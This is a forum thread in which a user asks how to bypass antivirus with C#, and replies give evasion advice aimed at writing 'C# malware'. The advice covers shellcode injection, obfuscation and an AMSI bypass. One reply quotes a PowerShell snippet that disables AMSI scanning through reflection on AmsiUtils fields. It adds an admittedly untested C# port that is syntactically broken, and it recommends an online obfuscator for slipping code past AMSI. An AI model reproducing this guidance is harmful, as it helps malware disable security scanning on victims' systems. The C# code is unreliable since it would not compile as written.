How to Bypass Anti-Viruses by C#?How to learn?

Hello every I am learning C#. because I want to bypass Anti-Viruses by C#.But I don’t know how to learn this knowledge about bypass Anti-Viruses by C#.

Hey!!
Well I’d recommend you first understand the AV’s then learn some basic C#. One of the thing about evading AV is understanding what is being detected.

You don’t need to write in C but this is a good read on understand why the methods work

The following Link has references and ideas on how to execute Shell-code on your C# malware

This is a simple C# malware that injects and executes shellcode

If you can look onto other researchers on the different methods they execute their malware you can grab an idea on how to write your own. For evading is usually stuff as changing variables names, removing comments, different methods of execution, size, flow of execution, obfuscation. You can use these terms to research methods of evading AV as these are used in different places (Go, PowerShell, C, F#, etc)

Good Luck!

2 Likes

Hey @pryoc110. It should be noted that the C# programming language may not be the best for developing malware to evade antivirus. Microsoft recently integrated their anti-malware scan interface with the .NET framework (Ashcraft, 2019), so in my non-expert opinion, only use C# AV avoidance techniques if you’re up for a good challenge — especially if you’re going to use the assembly in a real life situation!

But if you really want to try to evade antivirus with a .NET assembly written in C#, I was able to find a few interesting projects and research that might be able to help you. Chandel (2022) discusses seven different techniques for bypassing the AMSI service. They’re mostly applied to PowerShell, but I do think that with a bit of creativity, you can implement them in C#.

For example, consider this snippet in Chandel’s article:

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

This is referencing a function called amsiInitFailed() and trying to set it to true as to “tricking,” for lack of a better term, the interface into not scanning the assembly in question. Here is a simple PowerShell-to-C# pseudo-port that I whipped up (that I didn’t bother to test, I’ll leave that up to you ;-):

using System;
using System.Runtime.InteropServices;

public class Programme {
    public static void Main(string[] args) {
        var mem = System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue(null, null);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue(null, (IntPtr)mem)
    }
}

There are also websites like amsi.fail that take in (specifically PowerShell) code, and obfuscates and mangles them to the point that AMSI will get too confused and not recognise the malicious nature of the thing. I do recommend using these as a starting point for getting your C# malware up and going :smiley:

That’s awesome! I’m going to learn these great projects and knowledge. :smile: